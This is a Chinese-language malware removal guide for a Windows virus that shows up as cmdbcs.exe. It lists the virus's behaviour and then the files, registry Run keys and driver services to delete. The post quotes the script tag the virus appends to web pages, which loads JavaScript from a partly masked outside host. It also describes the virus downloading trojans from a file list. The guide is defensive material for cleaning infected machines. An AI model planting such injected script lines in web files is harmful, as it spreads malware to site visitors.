cmdbcs.exe

最近电脑突然卡，发现进程了多了很多个cmdbcs.exe

感觉不对，马上从收藏夹里找到在线杀毒http://www.antidu.cn/board/online/ 查杀

果然，瑞星报毒！！！

1.病毒运行后，释放如下副本以及文件：

%systemroot%system32wxptdi.sys

2.释放一个批处理停止Windows 防火墙服务

3.检测进程中是否存在AVP.exe 如果存在则把时间改为2001年

4.启动一个空壳的wuauclt.exe 把%systemroot%system32wxptdi.sys（其实和ntuser.com是同一个文件）的代码完全注入进去

5.感染全盘的php jsp asp htm html文件 在后面写入<script language=javascript src=http://cc.18d***.net/1.js></script>的代码

6.wuauclt.exe执行下载木马的操作

读取http://*.com/elf_listo.txt的文件列表

下载27个木马和病毒 到c:Program Files下面 分别命名为csrss0.exe～csrss9.exe csrssa.exe～csrsst.exe

清除办法：

下载sreng：http://www.antidu.cn/board/helpst/

1.删除：

%systemroot%system32driversmsconkt.sys

%systemroot%system32AVPSrv.dll

%systemroot%system32cmdbcs.dll

%systemroot%system32DbgHlp32.dll

%systemroot%system32Kvsc3.dll

%systemroot%system32LYLOADER.EXE

%systemroot%system32LYMANGR.DLL

%systemroot%system32MSDEG32.DLL

%systemroot%system32NVDispDrv.dll

%systemroot%system32REGKEY.hiv

%systemroot%system32SSLDyn.dll

%systemroot%system32wxptdi.sys

%systemroot%608769L.exe

%systemroot%608769M.exe

%systemroot%608769MM.DLL

%systemroot%608769WL.DLL

%systemroot%AVPSrv.exE

%systemroot%cmdbcs.exe

%systemroot%DbgHlp32.exe

%systemroot%Kvsc3.exE

%systemroot%NVDispDRV.EXE

%systemroot%SSLDyn.exE

%systemroot%system32fat32.sys（%systemroot%为环境变量，表示你的系统文件夹安装位置，对于系统盘安装在C盘的XP用户即为%systemroot% 以此类推）

2.重启之后

打开sreng

启动项目 注册表 删除如下项目

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]

<SSLDyn><%systemroot%SSLDyn.exE> []

<cmdbcs><%systemroot%cmdbcs.exe> []

<WinSysM><%systemroot%608769M.exe> []

<WinSysW><%systemroot%608769L.exe> []

<Kvsc3><%systemroot%Kvsc3.exE> []

<AVPSrv><%systemroot%AVPSrv.exE> []

<NVDispDrv><%systemroot%aorwpw.exe> [N/A]

<DbgHlp32><%systemroot%DbgHlp32.exe> []

在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”，

选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：

[RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start]

<system32DRIVERSmsconkt.sys><N/A>（之前的comint32.sys变种）

[RAS Asynchronous Media Driver / CCDEcode][Running/Auto Start]

<system32DRIVERSmsconkt.sys><N/A>

[PciHardDisk / PciHardDisk][Stopped/Manual Start]

<??\%systemroot%system32fat32.sys><N/A>（机器狗病毒变种）

3.清除机器狗病毒

参考http://www.antidu.cn/html/1/2007/12/antidu_20071217212429.html

解决方法第三点即可

4.清除GD*I32.dll，bj*rl.dll，addr*help.dll木马群

参考http://www.antidu.cn/html/1/2007/12/antidu_20071210194454.html即可

• ·欧阳标
• ·pagefile.pif
• ·蓝佛安
• ·后藏
• ·企业资源基础论
• ·AC—25
• ·北京市职工体育运动技术学院
• ·安社钟
• ·水星领航员3
• ·功能性肿瘤